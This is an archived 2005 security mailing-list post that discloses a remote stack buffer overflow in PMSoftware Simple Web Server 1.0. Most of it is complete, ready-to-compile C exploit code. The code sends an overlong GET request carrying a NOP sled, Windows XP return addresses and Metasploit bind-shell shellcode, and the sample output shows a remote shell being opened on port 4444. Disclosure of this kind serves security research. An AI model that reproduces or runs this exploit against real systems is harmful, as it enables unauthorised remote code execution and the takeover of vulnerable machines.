[EXPL] PMSoftware Simple Web Server Remote Buffer Overflow (Exploit)
From: SecuriTeam (support_at_securiteam.com)
Date: 04/21/05
- Previous message: SecuriTeam: "[EXPL] BitchX Buffer Overflow"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
To: list@securiteam.com Date: 21 Apr 2005 15:42:13 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
PMSoftware Simple Web Server Remote Buffer Overflow (Exploit)
------------------------------------------------------------------------
SUMMARY
" <http://www.pmx.it/> Simple Web Server the easy and small way to open an
HTTP Web Server"
PMSoftware's Simple Web Server doesn't do proper bounds checking handling
of normal GET requests. Sending an overlong page or script name, it causes
an buffer overflow and an attacker can run arbitrary code on the victims
machine.
DETAILS
Vulnerable Systems:
* PMsoftware Web Server version 1.0
/*
PMsoftware mini http server remote stack overflow exploit
author : c0d3r "kaveh razavi" c0d3rz_team@yahoo.com c0d3r@ihsteam.com
package : PMsoftware Web Server version 1.0
advisory : http://www.securiteam.com/windowsntfocus/5TP0B2KFGA.html
company address : www.pmx.it
timeline :
17 Feb 2005 : bug found by ERNW Security
18 Apr 2005 : Public Disclosure
18 Apr 2005 : crash exploit released (ERNW Security)
20 Apr 2005 : IHS exploit released , winxpsp1 & winxpsp2 target
compiled with visual c++ 6 : cl pm.c
greetz : IHSTeam members,exploit-dev mates, securiteam , str0ke-milw0rm
ihsteam.com (persian) www.ihssecurity.com (english , just started)
a big F*u to those who were/are/will trading konkoor questions-answers
(c) IHS security 2005
/*
/*
D:\projects>pm.exe 127.0.0.1 80 0
-------- PMSoftware web server remote overflow exploit by c0d3r
[+] building overflow string
[+] attacking host 127.0.0.1
[+] packet size = 680 byte
[+] connected
[+] sending the overflow string
[+] exploit sent successfully try telnet 127.0.0.1 4444
D:\projects>nc -vv 127.0.0.1 4444
DNS fwd/rev mismatch: localhost != kaveh
localhost [127.0.0.1] 4444 (?) open
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Program Files\PMSoftware>DONE !
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <winsock2.h>
#pragma comment(lib, "ws2_32.lib")
#define NOP 0x90
#define size 680
// 5 byte GET + 241 byte NOP junk + 4 byte containing return address
// + 30 byte NOP + 399 byte shellcode
// using metasploit great shellcode LPORT=4444 Size=399
unsigned char shellcode[] =
"\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x73\x17\x4f\x85"
"\x2f\x98\x83\xeb\xfc\xe2\xf4\xb3\x6d\x79\x98\x4f\x85\x7c\xcd\x19"
"\xd2\xa4\xf4\x6b\x9d\xa4\xdd\x73\x0e\x7b\x9d\x37\x84\xc5\x13\x05"
"\x9d\xa4\xc2\x6f\x84\xc4\x7b\x7d\xcc\xa4\xac\xc4\x84\xc1\xa9\xb0"
"\x79\x1e\x58\xe3\xbd\xcf\xec\x48\x44\xe0\x95\x4e\x42\xc4\x6a\x74"
"\xf9\x0b\x8c\x3a\x64\xa4\xc2\x6b\x84\xc4\xfe\xc4\x89\x64\x13\x15"
"\x99\x2e\x73\xc4\x81\xa4\x99\xa7\x6e\x2d\xa9\x8f\xda\x71\xc5\x14"
"\x47\x27\x98\x11\xef\x1f\xc1\x2b\x0e\x36\x13\x14\x89\xa4\xc3\x53"
"\x0e\x34\x13\x14\x8d\x7c\xf0\xc1\xcb\x21\x74\xb0\x53\xa6\x5f\xce"
"\x69\x2f\x99\x4f\x85\x78\xce\x1c\x0c\xca\x70\x68\x85\x2f\x98\xdf"
"\x84\x2f\x98\xf9\x9c\x37\x7f\xeb\x9c\x5f\x71\xaa\xcc\xa9\xd1\xeb"
"\x9f\x5f\x5f\xeb\x28\x01\x71\x96\x8c\xda\x35\x84\x68\xd3\xa3\x18"
"\xd6\x1d\xc7\x7c\xb7\x2f\xc3\xc2\xce\x0f\xc9\xb0\x52\xa6\x47\xc6"
"\x46\xa2\xed\x5b\xef\x28\xc1\x1e\xd6\xd0\xac\xc0\x7a\x7a\x9c\x16"
"\x0c\x2b\x16\xad\x77\x04\xbf\x1b\x7a\x18\x67\x1a\xb5\x1e\x58\x1f"
"\xd5\x7f\xc8\x0f\xd5\x6f\xc8\xb0\xd0\x03\x11\x88\xb4\xf4\xcb\x1c"
"\xed\x2d\x98\x5e\xd9\xa6\x78\x25\x95\x7f\xcf\xb0\xd0\x0b\xcb\x18"
"\x7a\x7a\xb0\x1c\xd1\x78\x67\x1a\xa5\xa6\x5f\x27\xc6\x62\xdc\x4f"
"\x0c\xcc\x1f\xb5\xb4\xef\x15\x33\xa1\x83\xf2\x5a\xdc\xdc\x33\xc8"
"\x7f\xac\x74\x1b\x43\x6b\xbc\x5f\xc1\x49\x5f\x0b\xa1\x13\x99\x4e"
"\x0c\x53\xbc\x07\x0c\x53\xbc\x03\x0c\x53\xbc\x1f\x08\x6b\xbc\x5f"
"\xd1\x7f\xc9\x1e\xd4\x6e\xc9\x06\xd4\x7e\xcb\x1e\x7a\x5a\x98\x27"
"\xf7\xd1\x2b\x59\x7a\x7a\x9c\xb0\x55\xa6\x7e\xb0\xf0\x2f\xf0\xe2"
"\x5c\x2a\x56\xb0\xd0\x2b\x11\x8c\xef\xd0\x67\x79\x7a\xfc\x67\x3a"
"\x85\x47\x68\xc5\x81\x70\x67\x1a\x81\x1e\x43\x1c\x7a\xff\x98";
unsigned int rc,sock,os,addr ;
struct sockaddr_in tcp;
struct hostent *hp;
WSADATA wsaData;
char buffer[size];
char jmp_esp[5];
unsigned short port;
char GET[] = "\x47\x45\x54\x20\x2F";
char winxpsp1[] = "\xCC\x59\xFB\x77";
char winxpsp2[] = "\xED\x1E\x94\x7C"; // not tested
int main (int argc, char *argv[]){
if(argc < 3) {
printf("\n-------- PMSoftware web server remote overflow exploit by
c0d3r\n");
printf("-------- usage : pm.exe host port target\n");
printf("-------- target 1 : windows xp service pack 1 : 0\n");
printf("-------- target 2 : windows xp service pack 1 : 1\n");
printf("-------- eg : pm.exe 127.0.0.1 80 0\n\n");
exit(-1) ;
}
printf("\n-------- PMSoftware web server remote overflow exploit by
c0d3r\n\n");
os = (unsigned short)atoi(argv[3]);
switch(os)
{
case 0:
strcat(jmp_esp,winxpsp1);
break;
case 1:
strcat(jmp_esp,winxpsp2); // wasnt checked
break;
default:
printf("\n[-] this target doesnt exist in the list\n\n");
exit(-1);
}
// Creating heart of exploit code
printf("[+] building overflow string");
memset(buffer,NOP,size);
memcpy(buffer,GET,sizeof(GET)-1);
memcpy(buffer+246,jmp_esp,sizeof(jmp_esp)-1);
memcpy(buffer+275,shellcode,sizeof(shellcode)-1);
buffer[size] = 0;
// EO heart of exploit code
if (WSAStartup(MAKEWORD(2,1),&wsaData) != 0){
printf("[-] WSAStartup failed !\n");
exit(-1);
}
hp = gethostbyname(argv[1]);
if (!hp){
addr = inet_addr(argv[1]);
}
if ((!hp) && (addr == INADDR_NONE) ){
printf("[-] unable to resolve %s\n",argv[1]);
exit(-1);
}
sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
if (!sock){
printf("[-] socket() error...\n");
exit(-1);
}
if (hp != NULL)
memcpy(&(tcp.sin_addr),hp->h_addr,hp->h_length);
else
tcp.sin_addr.s_addr = addr;
if (hp)
tcp.sin_family = hp->h_addrtype;
else
tcp.sin_family = AF_INET;
port=atoi(argv[2]);
tcp.sin_port=htons(port);
printf("\n[+] attacking host %s\n" , argv[1]) ;
Sleep(1000);
printf("[+] packet size = %d byte\n" , sizeof(buffer));
rc=connect(sock, (struct sockaddr *) &tcp, sizeof (struct sockaddr_in));
if(rc==0)
{
Sleep(1000) ;
printf("[+] connected\n") ;
printf("[+] sending the overflow string\n") ;
send(sock,buffer,strlen(buffer),0);
printf("[+] exploit sent successfully try telnet %s 4444\n" , argv[1]);
}
else {
printf("[-] ouch! Server is not listening .... \n");
}
shutdown(sock,1);
closesocket(sock);
}
// EO exploit code
Disclosure Timeline:
18.04.05 - Public Disclosure
18.04.05 - Crash exploit released (ERNW Security)
20.04.05 - IHS exploit released , winxpsp1 & winxpsp2 target
ADDITIONAL INFORMATION
The information has been provided by <mailto:c0d3r@ihsteam.com> c0d3r.
The original article can be found at:
<http://www.securiteam.com/windowsntfocus/5TP0B2KFGA.html>
http://www.securiteam.com/windowsntfocus/5TP0B2KFGA.html
More about Simple Web Server vulnerabilities:
<http://www.securiteam.com/windowsntfocus/5TP0B2KFGA.html> PMSoftware
Simple Web Server Buffer Overflow
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: SecuriTeam: "[EXPL] BitchX Buffer Overflow"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
